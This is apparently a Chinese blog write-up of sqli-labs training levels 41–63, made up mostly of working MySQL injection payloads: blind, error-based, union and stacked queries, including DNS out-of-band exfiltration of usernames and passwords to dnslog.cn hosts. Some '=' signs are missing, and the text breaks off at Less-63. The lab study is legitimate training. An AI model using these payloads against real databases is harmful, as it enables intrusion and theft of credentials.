公司网站怎么发布文章,做电商网站公司简介,免费在线观看电影,网络推广培训文章目录 一、sqli-labs靶场1.轮子模式总结2.Less-41 stacked Query Intiger type blinda.注入点判断b.轮子测试c.获取数据库名称d.堆叠注入e.堆叠注入外带注入获取表名f.堆叠注入外带注入获取列名g.堆叠注入外带注入获取表内数据 3.Less-42 Stacked Query error baseda.注入点… 文章目录 一、sqli-labs靶场1.轮子模式总结2.Less-41 stacked Query Intiger type blinda.注入点判断b.轮子测试c.获取数据库名称d.堆叠注入e.堆叠注入外带注入获取表名f.堆叠注入外带注入获取列名g.堆叠注入外带注入获取表内数据 3.Less-42 Stacked Query error baseda.注入点判断b.轮子测试c.获取数据库名称d.获取表名e.获取列名f.获取表内数据g.联合注入获取数据库名h.联合注入获取表名i.联合注入获取列名j.联合注入获取表内数据k.堆叠注入获取数据库名称 4.Less-43a.注入点判断b.轮子测试c.获取数据库名称d.获取表名e.获取列名f.获取表内数据g.联合注入堆叠注入外带注入获取数据库名称h.联合注入堆叠注入外带注入获取表名称i.联合注入堆叠注入外带注入获取列名称j.联合注入堆叠注入外带注入获取表内数据 5.Less-44a.注入点判断b.获取数据库名称c.获取表名d.获取列名e.获取表内数据 6.Less-45a.获取数据库名称b.获取表名c.获取列名d.获取表内数据 7.Less-46a.注入点判断b.轮子测试c.获取数据库名称d.获取表名e.获取列名f.获取表内数据 8.Less-47a.注入点判断b.轮子测试c.获取数据库名称d.获取表名e.获取列名f.获取表内数据 9.Less-48a.注入点判断b.轮子测试c.获取数据库名称d.获取表名e.获取列名f.获取表内数据 10.Less-49a.注入点判断b.轮子测试c.获取数据库名称d.获取表名e.获取列名f.获取表内数据 11.Less-50a.注入点判断b.轮子测试c.获取数据库名称d.获取表名e.获取列名f.获取表内数据 12.Less-51a.注入点判断b.轮子测试c.获取数据库名称d.获取表名e.获取列名f.获取表内数据 13.Less-52a.注入点判断b.轮子测试c.获取数据库名称d.获取表名e.获取列名f.获取表内数据 14.Less-53a.获取数据库名称b.获取表名c.获取列名d.获取表内数据 15.Less-54a.注入点判断b.轮子测试c.获取数据库名称d.获取表名e.获取列名f.获取表内数据 16.Less-55a.注入点判断b.轮子测试c.获取数据库名称d.获取表名e.获取列名f.获取表内数据 17.Less-56a.注入点判断b.轮子测试c.获取数据库名称d.获取表名e.获取列名f.获取表内数据 18.Less-57a.注入点判断b.轮子测试c.获取数据库名称d.获取表名e.获取列名f.获取表内数据 19.Less-58a.注入点判断b.轮子测试c.获取数据库名称d.获取表名e.获取列名f.获取表内数据 20.Less-59a.注入点判断b.轮子测试c.获取数据库名称d.获取表名e.获取列名f.获取表内数据 21.Less-60a.注入点判断b.轮子测试c.获取数据库名称d.获取表名e.获取列名f.获取表内数据 22.Less-61a.注入点判断b.轮子测试c.获取数据库名称d.获取表名e.获取列名f.获取表内数据23.Less-62a.注入点判断b.轮子测试c.获取数据库名称d.获取表名e.获取列名f.获取表内数据 24.Less-63a.注入点判断b.轮子测试c.获取数据库名称d.获取表名e.获取列名f.获取表内数据 25.Less-64a.注入点判断b.轮子测试c.获取数据库名称d.获取表名e.获取列名f.获取表内数据 26.Less-65a.注入点判断b.轮子测试c.获取数据库名称d.获取表名e.获取列名f.获取表内数据 三、笔记四、信息收集常用端口五、常用测试xss六、SQL注入万能密码七、本次攻防演练中得到的几点经验 一、sqli-labs靶场
1.轮子模式总结
到目前为止我总结了一下出现过的轮子可以得出一个结论首先需要知道有几个参数前面6种都是单参数的多参数的只能通过报错信息得知用–还是#也要看报错情况 ① n’ union select 1,2, ’ n可以是1-1,n’后面可接),select后面看情况设置显示位 ② )– )可选可换成 ③ ‘) --( )可换成))(可换成((‘可换成 ④ --或’ #或’ -- ⑤ ’ and if(11, sleep(1), 1)# ⑥ ) and sleep(1) # ⑦ , 1, 1)# ⑧ ‘) and 1 and (’ ⑨ ‘||1||’ ⑩ ‘#或‘– ⑪ 1’) anandd (if(11, sleep(1), 1)) anandd(1 ⑫
2.Less-41 stacked Query Intiger type blind
a.注入点判断
发现除了输入正确的id值有显示其他输入都没有显示 怀疑存在时间盲注 输入3 and sleep(1)试下
延迟1秒 输入3 and if(11, sleep(1),0)试下
还是延迟1秒 输入3 and if(12, sleep(1),0)
没有延迟 证明存在时间盲注点
b.轮子测试
轮子就是3 and if(1,sleep(1), 0)
c.获取数据库名称
测试长度 3 and if(length(database())8,sleep(1), 0)
说明长度是8 爆破字母 3 and if(substr(substr((database()), 1),1,1) ‘s’, sleep(1), 1)
接下来我们直接使用堆叠注入后面的内容略过
d.堆叠注入
3 and if(length(database())8,sleep(1), 0); 首先查看状态 show variables like ‘%general%’;
使用堆叠注入修改设置 3 and if(length(database())8,sleep(1), 0);set global general_log on;
修改成功 接下来我打算使用堆叠注入外地注入获得更多信息
e.堆叠注入外带注入获取表名
3 and if(length(database())8,sleep(1), 0);select load_file(concat(‘\\’,(select table_name FROM information_schema.tables WHERE table_schema database() limit2,1),‘.6bub0w.dnslog.cn\abc’));#
说明可以通过堆叠注入获取列名 只是外带注入一次只能获取一个值也不能使用group_concat
f.堆叠注入外带注入获取列名
3 and if(length(database())8,sleep(1), 0);select load_file(concat(‘\\’,(select column_name from information_schema.columns where table_name(select table_name FROM information_schema.tables WHERE table_schema database() limit 3, 1) and table_schemadatabase() limit 2,1),‘.6bub0w.dnslog.cn\abc’));#
g.堆叠注入外带注入获取表内数据
3 and if(length(database())8,sleep(1), 0);select load_file(concat(‘\\’,(select username from users where id 8),‘.6bub0w.dnslog.cn\abc’));select load_file(concat(‘\\’,(select password from users where id 8),‘.6bub0w.dnslog.cn\abc’));# 虽然说堆叠语句只能一个个获取数据但是我发现它可以这样用再加一条语句再加一条那样也相当于可以获取多个数据了
发现没有都出来了而且这个方法也省去了测试长度爆破的麻烦一次性获取数据
3.Less-42 Stacked Query error based 又是二次注入不是
因为创建用户名的入口被限制了那只能老老实实找注入点了
a.注入点判断
发现注入点在主界面密码框
触发条件是单数单引号
b.轮子测试
通过报错我们开始构造轮子 报错说明id是 “id’ ‘,即有两层单引号 输入2’ and 1’ --:near ‘’’ at line 1 输入2’and1–:near ‘and1–’’ at line 1 输入2’) and 1:near ‘) and 1’’ at line 1 两个引号怎么闭合不了呢
c.获取数据库名称
2’ and updatexml(1,concat(0x7e,(SELECTdatabase())),0x7e) and ’
终于出现了那么轮子就是 2’ and 1 and ’ 由此也可以得到一个经验看引号判断需要几个and
d.获取表名
2’ and updatexml(1, concat(0x7e,(select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema database()),0x7e), 0x7e) and ’
e.获取列名
2’ and updatexml(1, concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name(select table_name FROM information_schema.tables WHERE table_schema database() limit 3, 1) and table_schemadatabase() limit 0,1),0x7e), 0x7e) and ’
f.获取表内数据
2’ and updatexml(1, concat(0x7e,(select group_concat(username,‘:’, password) from users where id 4),0x7e), 0x7e) and ’
另外发现这里居然还可以用联合注入
g.联合注入获取数据库名
2’ union select 1,2,3 and’ 没有报错居然进去了
改成 2’ union select 1,database(),2 and’
直接拿到数据库名了
h.联合注入获取表名
2’ union select 1,(select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema database()),2 and’
i.联合注入获取列名
2’ union select 1,(select group_concat(column_name) from information_schema.columns where table_name(select table_name FROM information_schema.tables WHERE table_schema database() limit 3, 1) and table_schemadatabase() limit 0,1),2 and’
j.联合注入获取表内数据
2’ union select 1,(select group_concat(username,‘:’, password) from users),2 and’
2’ union select 1,(select group_concat(username,‘:’, password) from users where id4),2 and’
k.堆叠注入获取数据库名称
1’;select load_file(concat(‘\\’,(select database()),‘.kdah15.dnslog.cn\abc’)) and ;# 4.Less-43
a.注入点判断
还是密码框存在报错注入输入1’报 near ‘‘1’’)’ at line 1 猜测应该是’(‘‘id’’)‘,所以轮子应该类似 2’) and 1 and (’
b.轮子测试
输入2’) and 1 and (没有报错估计轮子可用
c.获取数据库名称
2’) and updatexml(1,concat(0x7e,(SELECTdatabase())),0x7e) and (’
d.获取表名
2’) and updatexml(1, concat(0x7e,(select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema database()),0x7e), 0x7e) and (’
e.获取列名
2’) and updatexml(1, concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name(select table_name FROM information_schema.tables WHERE table_schema database() limit 3, 1) and table_schemadatabase() limit 0,1),0x7e), 0x7e) and (’
f.获取表内数据
2’) and updatexml(1, concat(0x7e,(select group_concat(username,‘:’, password) from users where id 4),0x7e), 0x7e) and (’
g.联合注入堆叠注入外带注入获取数据库名称
奇怪了这里使用堆叠注入为啥拿不到数据呢 2’) and updatexml(1,concat(0x7e,(SELECT database())),0x7e);select load_file(concat(‘\\’,(select database()),‘.igqu2e.dnslog.cn\abc’)); 失败 2’) and updatexml(1,concat(0x7e,(SELECT database())),0x7e);set global general_log on;# 失败 1’);select load_file(concat(‘\\’,(select database()),‘.kdah15.dnslog.cn\abc’)) and (;#
分析后发现原因可能是前面的报错注入影响了后面的堆叠注入了因为把前面的报错注入去除就正常了这也给了我一个教训不能贪多 但是用联合注入加堆叠注入又可以说明就是报错注入引起的 2’) union select 1,database(),2;select load_file(concat(‘\\’,(select database()),‘.igqu2e.dnslog.cn\abc’)) ;#
h.联合注入堆叠注入外带注入获取表名称
2’) union select 1,(select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema database()),2;select load_file(concat(‘\\’,(select table_name FROM information_schema.tables WHERE table_schema database() limit 3,1),‘.igqu2e.dnslog.cn\abc’)) ;# 记住外带注入里不要用group_concat要用limit去指定取哪行
i.联合注入堆叠注入外带注入获取列名称
2’) union select 1,(select group_concat(column_name) from information_schema.columns where table_name(select table_name FROM information_schema.tables WHERE table_schema database() limit 3, 1) and table_schemadatabase()),2;select load_file(concat(‘\\’,(select column_name from information_schema.columns where table_name(select table_name FROM information_schema.tables WHERE table_schema database() limit 3, 1) and table_schemadatabase() limit 2,1),‘.igqu2e.dnslog.cn\abc’)) ;# j.联合注入堆叠注入外带注入获取表内数据
2’) union select 1,(select group_concat(username,‘:’, password) from users where id4),2; select load_file(concat(‘\\’,(select username from users where id4 ),‘.igqu2e.dnslog.cn\abc’)) ;# 2’) union select 1,(select group_concat(username,‘:’, password) from users where id4),2; select load_file(concat(‘\\’,(select password from users where id4 ),‘.igqu2e.dnslog.cn\abc’)) ;# 5.Less-44
这一关没有报错提示了看来只能用盲注
a.注入点判断
仍然是密码框存在注入
b.获取数据库名称
2’;select load_file(concat(‘\\’,(select database()),‘.ny8562.dnslog.cn\abc’));
看来这个外带注入还是比较好用特别是对盲注时不用再爆破了
c.获取表名
2’;select load_file(concat(‘\\’,(select table_name FROM information_schema.tables WHERE table_schema database() limit 0,1),‘.ny8562.dnslog.cn\abc’));select load_file(concat(‘\\’,(select table_name FROM information_schema.tables WHERE table_schema database() limit 2,1),‘.ny8562.dnslog.cn\abc’));select load_file(concat(‘\\’,(select table_name FROM information_schema.tables WHERE table_schema database() limit 3,1),‘.ny8562.dnslog.cn\abc’)); 一次性拿多条数据了
d.获取列名
2’;select load_file(concat(‘\\’,(select column_name from information_schema.columns where table_name(select table_name FROM information_schema.tables WHERE table_schema database() limit 3, 1) and table_schemadatabase() limit 0,1),‘.ny8562.dnslog.cn\abc’)) ;select load_file(concat(‘\\’,(select column_name from information_schema.columns where table_name(select table_name FROM information_schema.tables WHERE table_schema database() limit 3, 1) and table_schemadatabase() limit 1,1),‘.ny8562.dnslog.cn\abc’)) ;select load_file(concat(‘\\’,(select column_name from information_schema.columns where table_name(select table_name FROM information_schema.tables WHERE table_schema database() limit 3, 1) and table_schemadatabase() limit 2,1),‘.ny8562.dnslog.cn\abc’)) ;
e.获取表内数据
2’;select load_file(concat(‘\\’,(select username from users where id4 ),‘.ny8562.dnslog.cn\abc’)) ;# 2’;select load_file(concat(‘\\’,(select password from users where id4 ),‘.ny8562.dnslog.cn\abc’)) ;#
6.Less-45
仍然是密码框注入需要增加括号闭合
a.获取数据库名称
2’);select load_file(concat(‘\\’,(select database()),‘.xchvq5.dnslog.cn\abc’));
b.获取表名
2’);select load_file(concat(‘\\’,(select table_name FROM information_schema.tables WHERE table_schema database() limit 0,1),‘.xchvq5.dnslog.cn\abc’));select load_file(concat(‘\\’,(select table_name FROM information_schema.tables WHERE table_schema database() limit 2,1),‘.xchvq5.dnslog.cn\abc’));select load_file(concat(‘\\’,(select table_name FROM information_schema.tables WHERE table_schema database() limit 3,1),‘.xchvq5.dnslog.cn\abc’));
c.获取列名
2’);select load_file(concat(‘\\’,(select column_name from information_schema.columns where table_name(select table_name FROM information_schema.tables WHERE table_schema database() limit 3, 1) and table_schemadatabase() limit 0,1),‘.xchvq5.dnslog.cn\abc’)) ;select load_file(concat(‘\\’,(select column_name from information_schema.columns where table_name(select table_name FROM information_schema.tables WHERE table_schema database() limit 3, 1) and table_schemadatabase() limit 1,1),‘.xchvq5.dnslog.cn\abc’)) ;select load_file(concat(‘\\’,(select column_name from information_schema.columns where table_name(select table_name FROM information_schema.tables WHERE table_schema database() limit 3, 1) and table_schemadatabase() limit 2,1),‘.xchvq5.dnslog.cn\abc’)) ;
d.获取表内数据
2’);select load_file(concat(‘\\’,(select username from users where id4 ),‘.xchvq5.dnslog.cn\abc’)) ;select load_file(concat(‘\\’,(select password from users where id4 ),‘.xchvq5.dnslog.cn\abc’)) ;#
7.Less-46
Please input parameter as SORT with numeric value
a.注入点判断
这关啥意思呢输啥都看不到结果 后来才知道需要将参数名设为sort然后分别输入123结果都不同输入4以外报错
输入单引号报错但是再输入1个单引号报错不会消失
b.轮子测试
1 and 1# 输出正常
c.获取数据库名称
1 and updatexml(1,concat(0x7e,(SELECTdatabase())),0x7e) #
d.获取表名
1 and updatexml(1, concat(0x7e,(select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema database()),0x7e), 0x7e)#
e.获取列名
1 and updatexml(1, concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name(select table_name FROM information_schema.tables WHERE table_schema database() limit 3, 1) and table_schemadatabase() limit 0,1),0x7e), 0x7e) #
f.获取表内数据
1 and updatexml(1, concat(0x7e,(select group_concat(username,‘:’, password) from users where id 4),0x7e), 0x7e)#
8.Less-47
a.注入点判断
这一关现在只要不输单引号发现都是这个界面没有变化了咋回事
b.轮子测试
看提示error base single quote指的是单引号报错应该需要闭合 2’ and 1 and 没有错误
c.获取数据库名称
2’ and updatexml(1,concat(0x7e,(SELECTdatabase())),0x7e) and ’
d.获取表名
2’ and updatexml(1, concat(0x7e,(select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema database()),0x7e), 0x7e) and ’
e.获取列名
2’ and updatexml(1, concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name(select table_name FROM information_schema.tables WHERE table_schema database() limit 3, 1) and table_schemadatabase() limit 0,1),0x7e), 0x7e) and ’
f.获取表内数据
2’ and updatexml(1, concat(0x7e,(select group_concat(username,‘:’, password) from users where id 4),0x7e), 0x7e) and ’
9.Less-48
a.注入点判断
这一关是盲注只有正常与否两种状态 但是好奇怪盲注的延迟时间怎么这么久呢 3 and if(11,sleep(1),0)#
b.轮子测试
3 and if(12,sleep(1), 1) and (1)#
有延迟显示正确
c.获取数据库名称
3 and if(12,sleep(1), 1) and (select load_file(concat(‘\\’,(select database()),‘.9o20ch.dnslog.cn\abc’)))#
外带获取数据库名称记住不要把外带注入放在if里面
d.获取表名
3 and if(12,sleep(1), 1) and (select load_file(concat(‘\\’,(select table_name FROM information_schema.tables WHERE table_schema database() limit 3,1),‘.9o20ch.dnslog.cn\abc’)))#
e.获取列名
3 and if(12,sleep(1), 1) and (select load_file(concat(‘\\’,(select column_name from information_schema.columns where table_name(select table_name FROM information_schema.tables WHERE table_schema database() limit 3, 1) and table_schemadatabase() limit 2,1),‘.9o20ch.dnslog.cn\abc’)))#
f.获取表内数据
3 and if(12,sleep(1), 1) and (select load_file(concat(‘\\’,(select password from users where id4 ),‘.9o20ch.dnslog.cn\abc’)))#
10.Less-49
a.注入点判断
单引号出现盲注
b.轮子测试
3’ and if(12,sleep(1), 1) and (1) and # 显示正常
c.获取数据库名称
3’ and if(12,sleep(1), 1) and (select load_file(concat(‘\\’,(select database()),‘.9o20ch.dnslog.cn\abc’))) and #
d.获取表名
3’ and if(12,sleep(1), 1) and (select load_file(concat(‘\\’,(select table_name FROM information_schema.tables WHERE table_schema database() limit 3,1),‘.9o20ch.dnslog.cn\abc’))) and #
e.获取列名
3’ and if(12,sleep(1), 1) and (select load_file(concat(‘\\’,(select column_name from information_schema.columns where table_name(select table_name FROM information_schema.tables WHERE table_schema database() limit 3, 1) and table_schemadatabase() limit 2,1),‘.9o20ch.dnslog.cn\abc’))) and #
f.获取表内数据
3’ and if(12,sleep(1), 1) and (select load_file(concat(‘\\’,(select password from users where id4 ),‘.9o20ch.dnslog.cn\abc’))) and #
11.Less-50
a.注入点判断
加入引号发现有报错提示直接使用报错注入
b.轮子测试
3 and if(11,1,0) 显示正常
c.获取数据库名称
3 and if(11,updatexml(1,concat(0x7e,(SELECTdatabase())),0x7e),0)
d.获取表名
3 and if(11,updatexml(1, concat(0x7e,(select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema database()),0x7e), 0x7e) ,0)
e.获取列名
3 and if(11,updatexml(1, concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name(select table_name FROM information_schema.tables WHERE table_schema database() limit 3, 1) and table_schemadatabase() limit 0,1),0x7e), 0x7e),0)
f.获取表内数据
3 and if(11,updatexml(1, concat(0x7e,(select group_concat(username,‘:’, password) from users where id 4),0x7e), 0x7e),0)
另外发现这里还可以用堆叠注入 3 and if(11,sleep(1),0);select load_file(concat(‘\\’,(select database()),‘.d4u0mk.dnslog.cn\abc’))
12.Less-51
a.注入点判断
单引号报错注入
b.轮子测试
2’ and 1 and ’
c.获取数据库名称
2’ and updatexml(1,concat(0x7e,(SELECTdatabase())),0x7e) and ’
d.获取表名
2’ and updatexml(1, concat(0x7e,(select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema database()),0x7e), 0x7e) and ’
e.获取列名
2’ and updatexml(1, concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name(select table_name FROM information_schema.tables WHERE table_schema database() limit 3, 1) and table_schemadatabase() limit 0,1),0x7e), 0x7e) and ’
f.获取表内数据
2’ and updatexml(1, concat(0x7e,(select group_concat(username,‘:’, password) from users where id 4),0x7e), 0x7e) and ’
13.Less-52
a.注入点判断
这一关只有输入1,2,3才有显示其他一概不显示 输入3 and if(11,sleep(1),0)有延迟时间盲注
b.轮子测试
使用堆叠注入 3 and if(11,sleep(1),0);1;
c.获取数据库名称
3 and if(11,sleep(1),0);select load_file(concat(‘\\’,(select database()),‘.j6fykz.dnslog.cn\abc’));
d.获取表名
3 and if(11,sleep(1),0);select load_file(concat(‘\\’,(select table_name FROM information_schema.tables WHERE table_schema database() limit 3,1),‘.j6fykz.dnslog.cn\abc’));
e.获取列名
3 and if(11,sleep(1),0);select load_file(concat(‘\\’,(select column_name from information_schema.columns where table_name(select table_name FROM information_schema.tables WHERE table_schema database() limit 3, 1) and table_schemadatabase() limit 2,1),‘.j6fykz.dnslog.cn\abc’));
f.获取表内数据
3 and if(11,sleep(1),0);select load_file(concat(‘\\’,(select password from users where id4 ),‘.j6fykz.dnslog.cn\abc’));
14.Less-53
这一关和上一关的区别是需要加单引号注入
a.获取数据库名称
3’ and if(11,sleep(1),0);select load_file(concat(‘\\’,(select database()),‘.j6fykz.dnslog.cn\abc’));
b.获取表名
3’ and if(11,sleep(1),0);select load_file(concat(‘\\’,(select table_name FROM information_schema.tables WHERE table_schema database()%20 limit 3,1),‘.j6fykz.dnslog.cn\abc’));
c.获取列名
3’ and if(11,sleep(1),0);select load_file(concat(‘\\’,(select column_name from information_schema.columns where table_name(select table_name FROM information_schema.tables WHERE table_schema database() limit 3, 1) and table_schemadatabase() limit 2,1),‘.j6fykz.dnslog.cn\abc’));
d.获取表内数据
3’ and if(11,sleep(1),0);select load_file(concat(‘\\’,(select password from users where id4 ),‘.j6fykz.dnslog.cn\abc’));
15.Less-54
a.注入点判断
54关又不一样了
意思是它会给你10次试错机会10次还是失败的话重置所有随机数据 首先url输入id
然后输入key,每次报错都会累加已尝试的次数 但是怎么看不到报错呢是在url里注入吗id里发现加单引号不显示再加又有显示说明存在盲注
b.轮子测试
那么轮子怎么构造呢对那就不用管下面那个输入框了直接url注入就行了 1’ and if(11,sleep(1),0) and (1)–
延迟1秒说明正确
c.获取数据库名称
1’ and if(11,sleep(1),0) and (select load_file(concat(‘\\’,(select database()),‘.lx01qu.dnslog.cn\abc’)))–
数据库名称是challanges
d.获取表名
1’ and if(11,sleep(1),0) and (select load_file(concat(‘\\’,(select table_name FROM information_schema.tables WHERE table_schema database() limit 0,1),‘.lx01qu.dnslog.cn\abc’)))–
看来只有一个表
e.获取列名
1’ and if(11,sleep(1),0) and (select load_file(concat(‘\\’,(select column_name from information_schema.columns where table_name(select table_name FROM information_schema.tables WHERE table_schema database() limit 0, 1) and table_schemadatabase() limit 2, 1),‘.63lr5q.dnslog.cn\abc’)))–
实际表格如下
f.获取表内数据
首先需要先获取表名和列名然后带入才能获取数据 vamnq7byet secret_VEKS 1’ and if(11,sleep(1),0) and (select load_file(concat(‘\\’,(select secret_VEKS from vamnq7byet where id1 ),‘.63lr5q.dnslog.cn\abc’)))–
下面的输入框输入Sn04znQcZJNl6L0tADgOhcRS提示正确
英文表示祝贺你成功了
16.Less-55
a.注入点判断 这次可以试错14次是难度减低了还是提高了 不管他先看下怎么注入发现除了数字其他都不显示看来要盲注了
b.轮子测试
4 and if(11,sleep(1),0) and (1)#
出现延时那轮子应该就是它了
c.获取数据库名称
4 and if(11,sleep(1),0) and (select load_file(concat(‘\\’,(select database()),‘.leccsl.dnslog.cn\abc’)))# 单独运行select有数据但是为啥界面没结果呢
大概是语句哪里还是不对吧重新构造轮子
and if(11,1,0) and (1)–
嗯这里有显示才能用之前的轮子没显示难怪怎么都没反应所以记住了以后构造的轮子一定要显示结果才行 1)and if(11,1,0) and (select load_file(concat(‘\\’,(select database()),‘.f1xl21.dnslog.cn\abc’)))–
d.获取表名
1)and if(11,1,0) and (select load_file(concat(‘\\’,(select table_name FROM information_schema.tables WHERE table_schema database() limit 0,1),‘.f1xl21.dnslog.cn\abc’)))–
uhf25xqo3t
e.获取列名
1)and if(11,1,0) and (select load_file(concat(‘\\’,(select column_name from information_schema.columns where table_name(select table_name FROM information_schema.tables WHERE table_schema database() limit 0, 1) and table_schemadatabase() limit 2, 1),‘.f1xl21.dnslog.cn\abc’)))–
secret_WUAZ
f.获取表内数据
and if(11,1,0) and (select load_file(concat(‘\\’,(select secret_WUAZ from uhf25xqo3t where id1),‘.f1xl21.dnslog.cn\abc’)))–
记住sql语句里不要插入回车符 d7oT09Des0BDFr51bmmpn0Gv 输入这串数字成功过关
17.Less-56
a.注入点判断
还是这种题看来后面都是这种类型的单引号盲注报错注入
b.轮子测试
4’) and (1) -- 正常输出记住了像这样才是对的
c.获取数据库名称
4’) and (select load_file(concat(‘\\’,(select database()),‘.6oq86c.dnslog.cn\abc’))) --
d.获取表名
4’) and (select load_file(concat(‘\\’,(select table_name FROM information_schema.tables WHERE table_schema database() limit 0,1),‘.6oq86c.dnslog.cn\abc’))) --
9q15lsxx4o
e.获取列名
4’) and (select load_file(concat(‘\\’,(select column_name from information_schema.columns where table_name(select table_name FROM information_schema.tables WHERE table_schema database() limit 0, 1) and table_schemadatabase() limit 2, 1),‘.6oq86c.dnslog.cn\abc’))) --
secret_F62S
f.获取表内数据
4’) and (select load_file(concat(‘\\’,(select secret_F62S from 9q15lsxx4o where id1),‘.6oq86c.dnslog.cn\abc’))) --
MRS84WI5bRz1wUEPRjwkOTNN
18.Less-57
a.注入点判断
双引号注入没什么好说的
b.轮子测试
4 and (1)–
c.获取数据库名称
4 and (select load_file(concat(‘\\’,(select database()),‘.6oq86c.dnslog.cn\abc’))) --
d.获取表名
4 and (select load_file(concat(‘\\’,(select table_name FROM information_schema.tables WHERE table_schema database() limit 0,1),‘.6oq86c.dnslog.cn\abc’)))–
kxkae71r4p
e.获取列名
4 and (select load_file(concat(‘\\’,(select column_name from information_schema.columns where table_name(select table_name FROM information_schema.tables WHERE table_schema database() limit 0, 1) and table_schemadatabase() limit 2, 1),‘.6oq86c.dnslog.cn\abc’)))–
secret_R3DQ
f.获取表内数据
4 and (select load_file(concat(‘\\’,(select secret_R3DQ from kxkae71r4p where id1),‘.6oq86c.dnslog.cn\abc’)))–
qCPyRxfEqRmVzBQYyVQ5Y3h9
19.Less-58
a.注入点判断 终于出现报错注入了
b.轮子测试
2’ and (1) --
c.获取数据库名称
2’ and (updatexml(1,concat(0x7e,(SELECTdatabase())),0x7e)) --
d.获取表名
2’ and (updatexml(1, concat(0x7e,(select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema database()),0x7e), 0x7e)) --
k9e8a7yl0f
e.获取列名
2’ and (updatexml(1, concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name(select table_name FROM information_schema.tables WHERE table_schema database() limit 0, 1) and table_schemadatabase() limit 0,1),0x7e), 0x7e)) --
secret_58RO
f.获取表内数据
2’ and (updatexml(1, concat(0x7e,(select secret_58RO from k9e8a7yl0f where id 1),0x7e), 0x7e)) --
Vd6Sg7IYEnmoKrdsx3u74wAa
20.Less-59
a.注入点判断
报错注入不用加引号啥的
b.轮子测试
2 and 1 --
c.获取数据库名称
2 and updatexml(1,concat(0x7e,(SELECTdatabase())),0x7e)–
d.获取表名
2 and updatexml(1, concat(0x7e,(select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema database()),0x7e), 0x7e) --
qi7pnhikpv
e.获取列名
2 and updatexml(1, concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name(select table_name FROM information_schema.tables WHERE table_schema database() limit 0, 1) and table_schemadatabase() limit 0,1),0x7e), 0x7e) --
secret_OLE6
f.获取表内数据
2 and updatexml(1, concat(0x7e,(select secret_OLE6 from qi7pnhikpv where id 1),0x7e), 0x7e) --
2229WftWHjdVjMEaS6yr9O3a
21.Less-60
a.注入点判断
双引号报错注入但是需要括号闭合
b.轮子测试
3) and 1 --
c.获取数据库名称
3) and updatexml(1,concat(0x7e,(SELECTdatabase())),0x7e) --
d.获取表名
3) and updatexml(1, concat(0x7e,(select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema database()),0x7e), 0x7e) --
hofp86ahow
e.获取列名
3) and updatexml(1, concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name(select table_name FROM information_schema.tables WHERE table_schema database() limit 0, 1) and table_schemadatabase() limit 0,1),0x7e), 0x7e) --
secret_NAX1
f.获取表内数据
3) and updatexml(1, concat(0x7e,(select secret_NAX1 from hofp86ahow where id 1),0x7e), 0x7e) --
0CxW5gDfT4RrJWkO371mJwmU
22.Less-61
a.注入点判断
单引号报错注入但是需要双括号闭合
b.轮子测试
3’)) and 1 --
c.获取数据库名称
3’)) and updatexml(1,concat(0x7e,(SELECTdatabase())),0x7e) --
d.获取表名
3’)) and updatexml(1, concat(0x7e,(select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema database()),0x7e), 0x7e) --
jy0p59437z
e.获取列名
3’)) and updatexml(1, concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name(select table_name FROM information_schema.tables WHERE table_schema database() limit 0, 1) and table_schemadatabase() limit 0,1),0x7e), 0x7e) --
secret_AX65
f.获取表内数据
3’)) and updatexml(1, concat(0x7e,(select secret_AX65 from jy0p59437z where id 1),0x7e), 0x7e) --
zJn62X2QZ1xqyyJLUdkCeqEu
23.Less-62
a.注入点判断
单引号盲注
b.轮子测试
3’) and if(11,sleep(1),0) and (1) --
延迟1秒另外盲注不需要看显示报错和联合注入才需要只看延迟就行
c.获取数据库名称
3’) and if(11,sleep(1),0) and (select load_file(concat(‘\\’,(select database()),‘.vsc4qg.dnslog.cn\abc’))) --
d.获取表名
3’) and if(11,sleep(1),0) and (select load_file(concat(‘\\’,(select table_name FROM information_schema.tables WHERE table_schema database() limit 0,1),‘.vsc4qg.dnslog.cn\abc’))) --
06pq63s5ri
e.获取列名
3’) and if(11,sleep(1),0) and (select load_file(concat(‘\\’,(select column_name from information_schema.columns where table_name(select table_name FROM information_schema.tables WHERE table_schema database() limit 0, 1) and table_schemadatabase() limit 2, 1),‘.vsc4qg.dnslog.cn\abc’))) --
secret_KXH7
f.获取表内数据
3’) and if(11,sleep(1),0) and (select load_file(concat(‘\\’,(select secret_KXH7 from 06pq63s5ri where id1),‘.vsc4qg.dnslog.cn\abc’))) --
eyhWTtqVrtmuDFdoYsQHfs6W
24.Less-63
a.注入点判断
还是单引号盲注估计还是需要判断闭合
b.轮子测试
3’ and if(11,sleep(1),0) and (1) --
居然不用考虑闭合
c.获取数据库名称
3’ and if(11,sleep(1),0) and (select load_file(concat(‘\\’,(select database()),‘.vsc4qg.dnslog.cn\abc’))) --
d.获取表名
3’ and if(11,sleep(1),0) and (select load_file(concat(‘\\’,(select table_name FROM information_schema.tables WHERE table_schema database() limit 0,1),‘.vsc4qg.dnslog.cn\abc’))) --
62ru7lcvyu
e.获取列名
3’ and if(11,sleep(1),0) and (select load_file(concat(‘\\’,(select column_name from information_schema.columns where table_name(select table_name FROM information_schema.tables WHERE table_schema database() limit 0, 1) and table_schemadatabase() limit 2, 1),‘.vsc4qg.dnslog.cn\abc’))) --
secret_VS47
f.获取表内数据
